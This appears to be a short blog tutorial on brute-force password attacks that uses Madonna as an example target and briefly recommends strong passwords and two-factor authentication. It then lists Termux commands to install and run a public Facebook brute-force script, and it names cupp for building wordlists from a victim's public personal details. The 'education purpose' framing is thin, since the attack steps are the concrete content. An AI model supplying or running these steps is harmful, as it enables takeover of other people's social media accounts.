What is Brute Force Attack? And How To Protect Yourself.
Brute Force attack is basically a attack where a hacker create a password word list for the victim which had possible passwords of his specific account.
Let's discuss about brute force that how it works using a example.
E.g Madonna had some social accounts a hacker wants to access her accounts for that hacker attacks on her accounts with a password wordlist that is generated by the information which is available publicly. Like her name date of birth her pet name her surname and other information.
How to protect your account from Brute Force attack?
You can protect your account from brute force attack by choosing a strong password. Also you can protect your account by using two factor authentication. So basically two factor authentication is a second layer of security which helps you to protect your accounts from being hacked.
Let's do a demo of brute force attack on my own account for education purpose. So this could help you to understand better that how to choose passwords.
For this purpose we are using cupp for password wordlist generation and a python Tool For attacking.
Termux Commands
pkg update
pkg upgrade
pkg install python -y && pkg install python2 -y
pkg install git -y
pkg install wget -y
git clone https://github.com/IAmBlackHacker/Facebook-BruteForce
cd Facebook-BruteForce
pip2 install required mechanize
pip install mechanize
python2 fb2.py
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